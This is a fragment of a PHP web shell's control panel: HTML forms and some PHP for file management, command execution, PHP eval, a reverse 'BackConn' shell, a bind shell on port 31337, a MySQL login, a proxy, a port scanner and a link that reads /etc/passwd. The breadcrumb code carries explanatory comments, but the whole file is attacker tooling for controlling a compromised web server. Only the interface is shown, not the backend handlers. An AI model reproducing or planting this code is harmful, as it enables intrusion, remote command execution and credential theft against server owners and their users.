<input type=text name='mkfile' size="12">
|
|
<input name="submit" type=submit value=make>
|
|
</div>
|
|
</form> </td>
|
|
<td style="border:#FFFFFF 1px solid;"> <form action=# name='delfile' method=post>
|
|
<div align="center"><strong>:: Delete File :: </strong><br>
|
|
<input type=hidden name=mode value=delfile>
|
|
name
|
|
<input type=text name='delfile' size="12">
|
|
<input type=submit value=unlink>
|
|
</div>
|
|
</form> </td>
|
|
</tr>
|
|
<tr>
|
|
<td style="border:#FFFFFF 1px solid;"><form method="post" action="#" enctype="multipart/form-data">
|
|
<div align="center"><strong>:: upload :: </strong><br>
|
|
<input type="hidden" name="mode" value="upload2" />
|
|
<input name="myfile" type="file" id="myfile" value="Load..." size="20" />
|
|
<input type="submit" name="ok" value="do" />
|
|
</div>
|
|
</form> </td>
|
|
<td style="border:#FFFFFF 1px solid;"><form action=# method=post>
|
|
<div align="center"><strong>:: Rename File :: </strong><br>
|
|
<input type="hidden" name="mode" value="renfile" />
|
|
<input type="text" name="oldname" value="0ld name" size="15" />
|
|
<input type="text" name="newname" value="New name" size="15" />
|
|
<input name="submit" type="submit" value="Ren" />
|
|
</div>
|
|
</form> </td>
|
|
<td style="border:#FFFFFF 1px solid;"><form action="#" method="post">
|
|
<div align="center"><strong>:: Make Dir :: </strong><br>
|
|
<input type="hidden" name="mode" value="mkdir" />
|
|
name
|
|
<input name="mkdir" type="text" size="18" />
|
|
<input name="submit" type="submit" value="ok" />
|
|
</div>
|
|
</form> </td>
|
|
</tr>
|
|
<tr>
|
|
<td style="border:#FFFFFF 1px solid;"><form action=# method=post>
|
|
<div align="center"><strong>:: Cmd Execution :: </strong><br>
|
|
<input type=hidden name=mode value=cmd>
|
|
<input name=cmd size="26" tpye=text>
|
|
<input name="submit" type=submit value=exec>
|
|
</div>
|
|
</form> </td>
|
|
<td style="border:#FFFFFF 1px solid;"><form action="#" method="post">
|
|
<div align="center"><strong>:: BackConn :: </strong><br>
|
|
<input type=hidden name=mode value=reverse />
|
|
<input name="ip" type="text" value="<?=$_SERVER['REMOTE_ADDR']?>" size="26" />
|
|
<input name="port" type="text" value="port..." size="10" />
|
|
<input name="submit" type="submit" value="BackConn" />
|
|
</div>
|
|
</form> </td>
|
|
<td style="border:#FFFFFF 1px solid;"><form action=# method="post">
|
|
<div align="center"><strong>:: Bind Port :: </strong><br>
|
|
<input type="hidden" name="mode" value="bind" />
|
|
<input name="submit7" type=submit value="Bind port 31337" />
|
|
</div>
|
|
</form> </td>
|
|
</tr>
|
|
<tr>
|
|
<td style="border:#FFFFFF 1px solid;"><form action="#" method="post" name="sqlpanel" id="sqlpanel">
|
|
<div align="center"><strong>:: MySQL Panel :: </strong><br>
|
|
<input type=hidden name=mode value=loginsql />
|
|
<input name="user" type="text" value="<?=(isset($_COOKIE[mysql_user]))?$_COOKIE[mysql_user]:"user"?>" size="9" />
|
|
<input type="text" size="10" name="pass" value="<?=(isset($_COOKIE[mysql_pass]))?$_COOKIE[mysql_pass]:"pass"?>" />
|
|
<input type="text" name="host" size="10" value="<?=(isset($_COOKIE[mysql_host]))?$_COOKIE[mysql_host]:"host"?>" />
|
|
<input name="dbname" type="text" value="<?=(isset($_COOKIE[mysql_name]))?$_COOKIE[mysql_name]:"database"?>" size="10" />
|
|
<input name="submit" type="submit" value="MySQL" />
|
|
</div>
|
|
</form> </td>
|
|
<td style="border:#FFFFFF 1px solid;"><form method="post" action="#">
|
|
<div align="center"><strong>:: PHP Execution :: </strong><br>
|
|
<input type="hidden" value="eval" name="mode" />
|
|
<input name="eval" type="text" size="30" />
|
|
<input type="submit" value="Eval" />
|
|
</div>
|
|
</form> </td>
|
|
<td style="border:#FFFFFF 1px solid;"><form action=# method=post name="folder" id="folder">
|
|
<div align="center"><strong>:: Go Dir ::</strong> <br>
|
|
<input type=hidden name='mode' value='ls'>
|
|
<input type=text value='<?=$dir?>' name='dir'>
|
|
<input type=submit value=change/list>
|
|
</div>
|
|
</form></td>
|
|
</tr>
|
|
<tr>
|
|
<td style="border:#FFFFFF 1px solid;"><div align="center">
|
|
<form method="post" action="#">
|
|
<strong>:: Proxy ::</strong> <br>
|
|
<input name="mode" type="hidden" id="mode" value="proxysurf" />
|
|
url: <input name="url" type="text" size="30" />
|
|
<input type="submit" value="surf" />
|
|
<input name="curl" type="checkbox" id="curl" value="curl" /> curl
|
|
<input name="fopen" type="checkbox" id="fopen" value="fopen" /> fopen<br />
|
|
|
|
</form></div>
|
|
</td>
|
|
<td style="border:#FFFFFF 1px solid;"><form method="post" action="#">
|
|
<div align="center"><strong>:: File Change Mode:: </strong><br>
|
|
<input type="hidden" value="chmod" name="mode" />
|
|
<input name="filename" type="text" id="filename" value="file" size="15" />
|
|
<input name="filemode" type="text" id="filemode" value="mode" size="15" />
|
|
<input type="submit" value="Chmod" />
|
|
</div>
|
|
</form> </td>
|
|
<td style="border:#FFFFFF 1px solid;"><form method="post" action="#">
|
|
<div align="center"><strong>:: Port Scan :: </strong><br>
|
|
<input type="hidden" value="scan" name="mode" />
|
|
<input name="host" type="text" id="host" value="host" size="15" />
|
|
<input name="minport" type="text" value="max port" size="10" />
|
|
<input name="maxport" type="text" id="maxport" value="max port" size="10" />
|
|
<input type="submit" value="scan" />
|
|
</div>
|
|
</form> </td>
|
|
</tr>
|
|
</table>
|
|
<form action=# name=tools method=post>
|
|
<span class="Stile1">
|
|
<input type=hidden name=mode value=tools />
|
|
<input type=hidden name=nometool />
|
|
</span>
|
|
</form>
|
|
<span class="Stile1">
|
|
<div align="center"><a class="link" href="javascript:document.folder.dir.value='<?=addslashes(realpath("."))?>';document.folder.submit();">Home</a> - <a class="link" href="javascript:document.tools.nometool.value='passwd';document.tools.submit();">Cat /etc/passwd</a> - <a class="link" href="javascript:document.tools.nometool.value='encoder';document.tools.submit();">Encoder</a> - <a class="link" href="javascript:document.tools.mode.value='phpinfo';document.tools.submit();">PHPInfo</a> - <a class="link" href="javascript:document.tools.nometool.value='scanner';document.tools.submit();">ShellScan</a> - <a class="link" href="javascript:document.tools.nometool.value='proxy';document.tools.submit();">Proxy</a> </div>
|
|
<br>
|
|
Directory:</span>
|
|
<? $pd = $e = explode(DIRECTORY_SEPARATOR,substr($dir,0,-1));
// Breadcrumb for the current directory: $dir (set outside this block) is split into
// its components after dropping its last character, and one link is printed per
// component. Each link puts the cumulative path up to that component into the
// "folder" form's 'dir' field and submits it (mode=ls).
|
|
$i = 0;
|
|
foreach($pd as $b)
|
|
{
|
|
// Rebuild the path prefix that ends at component number $i.
$t = "";
|
|
$j = 0;
|
|
foreach ($e as $r)
|
|
{
|
|
$t.= $r.DIRECTORY_SEPARATOR;
|
|
if ($j == $i) {break;}
|
|
$j++;
|
|
}
|
|
// The visible label is HTML-escaped; the path placed in the javascript: URL is
// passed through addslashes() and urlencode().
echo "<a class=\"link\" href=\"javascript:document.folder.dir.value='".urlencode(addslashes($t))."';document.folder.submit();\"><b>".htmlspecialchars($b).DIRECTORY_SEPARATOR."</b></a>";
|
|
$i++;
|
|
}
|
|
?><br>
|
|
<br>
|
|
<?=$error?><?=$output?> </td>
|
|
</tr>
|
|
</table>
|
|
</body>
|
|
|
|
</html>
|
|
<? die(); ?>
|